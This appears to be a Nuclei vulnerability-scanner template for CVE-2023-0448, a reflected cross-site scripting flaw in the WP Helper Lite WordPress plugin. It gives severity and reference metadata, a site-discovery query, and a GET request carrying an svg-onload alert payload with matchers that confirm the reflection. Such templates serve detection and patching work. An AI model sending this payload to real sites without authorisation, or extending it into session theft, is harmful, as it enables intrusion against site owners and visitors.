id: CVE-2023-0448 info: name: WP Helper Lite < 4.3 - Cross-Site Scripting author: ritikchaddha severity: medium description: | The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 4.3 and above reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 - https://nvd.nist.gov/vuln/detail/CVE-2023-0448 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 epss-score: 0.00078 epss-percentile: 0.32657 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: matbao product: wp_helper_premium framework: wordpress publicwww-query: "/wp-content/plugins/wp-helper-lite" tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(header, "text/html")' - 'contains(body, ">")' - 'contains(body, "params\":{\"action")' condition: and # digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950